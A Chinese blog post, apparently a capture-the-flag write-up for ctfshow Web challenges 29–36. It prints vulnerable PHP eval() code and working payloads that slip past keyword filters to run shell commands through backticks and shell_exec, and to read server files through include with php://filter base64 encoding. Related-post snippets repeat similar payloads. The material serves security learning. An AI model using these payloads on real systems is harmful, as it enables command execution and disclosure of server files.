ctfshow-Web入门-29~36wp

最新推荐文章于 2024-04-22 15:30:24 发布
最新推荐文章于 2024-04-22 15:30:24 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/108424882
版权

Web29

<?php



error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

eval函数

image-20200905113918697

了解 eval函数之后

传入

?c=echo "Y2my";?>ctf <?php system('ls');

得到了flag 的位置

image-20200905114158242

由于是 php,直接 cat flag.php 会被解析

所以 改为 include 包含一下,在编码

传入

?c=echo "Y2my"; ?>ctf <?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php

image-20200905114349152

得到flag

Web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

相比 Web29 增加了过滤规则

首先传入

?c=echo "Y2my "; echo `ls`; ?>

查看flag位置

`` 在linux 会当成命令执行

当然也可以用 shell_exec();

?c=echo "Y2my "; echo shell_exec(‘ls’); ?>

传入

?c=echo "Y2my "; include($_GET['url']); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php

base64 解码

得到flag

Web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

增加了过滤

首先查看flag位置

?c=$y2my=1;echo/**/`ls`;?>

flag.php index.php

由于增加 ’ 单引号的过滤,所以还是用之前的payload

单引号改为双引号就行了

?c=$y2my=1;echo/**/`ls`;include($_GET["url"]);?>&url=php://filter/read=convert.base64-encode/resource=flag.php

flag.php index.php PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImZsYWd7YWNhMGY4YzEtMGQ3Ny00NTYzLTk0NjMtNDhkZjZmZjMwYWMyfSI7DQo=

转码得到flag

Web32

在看完 羽大佬的wp后,发现 include可以不用括号

这样一来就不需要考虑 被过滤的括号了

下图为其他不用括号的函数

img-07rGnnFx-1599312559568

图来自群大佬

Payload

?c=$y2my=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

Web33

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web34

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

和33一样

Web35

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web36

由于增加了过滤数字所以将1替换为字母

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
赛博雨天
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow-WEB入门-命令执行 (WEB29~WEB44)
weixin_40103894的博客
11-28 613
ctfshow-WEB入门-命令执行 (WEB29~WEB44)
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 534
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
ctfshow web29-web40
最新发布
m0_73721944的博客
04-22 767
1=php://filter/convert.base64-encode/resource=flag.php:使用GET请求传递参数"1",该参数的值为php://filter/convert.base64-encode/resource=flag.php。这是一种特殊的文件包含方式,其中php://filter用于对文件进行过滤和转换,convert.base64-encode表示将文件内容进行Base64编码,而resource=flag.php指定了要读取的文件为flag.php。
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3087
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
PHP-伪协议
摘星怪sec的blog
04-25 3638
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
【CTFshow】命令执行web29-web54
weixin_51614272的博客
02-23 2510
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令去执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
web入门 命令执行 web29-web41
博客地址 www.sec0nd.top
03-14 5425
文章目录web29web30web31web32 参考文章:命令执行绕过小技巧、命令执行漏洞进阶 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 输入c变量,把c中的flag过滤掉,然
CTFshow——命令执行
lee_maple的博客
04-23 5555
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
**WP-CLI(WordPress Command Line Interface)是WordPress开发和管理中的一个强大工具,它允许用户通过命令行界面执行各种操作,而无需通过图形用户界面。本教程将带你深入理解WP-CLI,包括如何安装、使用基础命令...
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
wp-china-yes插件
12-03
**WP-China-Yes插件详解** 在WordPress的众多插件中,WP-China-Yes是一款针对中国用户特别设计的工具,旨在解决国内用户访问基于WordPress搭建的网站时速度慢的问题。这款插件通过优化资源加载、缓存策略以及采用...
CTFshow-web入门-命令执行
m0_52920608的博客
03-26 5255
CTFshow web入门 命令执行 ctfshowweb命令执行
ctfshow web入门 命令执行
qq_50589021的博客
10-07 2731
命令执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?> 考点: 绕过特殊字符的过滤 payload: ?c=system('ls');//flag.php index.php ?
ctfhsow web入门 命令执行大全
wangringyi的博客
09-25 2658
全网最全命令执行方法
CTFshow--web入门--命令执行(29--55)
weixin_53425135的博客
11-23 2475
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
CTFSHOW-命令执行
Monica的博客
09-03 4004
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
CTFshow刷题日记-WEB-命令执行上29-55
Love&Share
09-03 9008
类型一: 变量c来接受并过滤传入的数据,eval函数来执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,使用*号,通配符绕过即可 /?c=system("cat%20fla
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。而引用中提到,萌新隐写题目可能是纯签到题,可以在公告中找到或者输入萌新码。根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供更多相关的信息,我将尽力帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值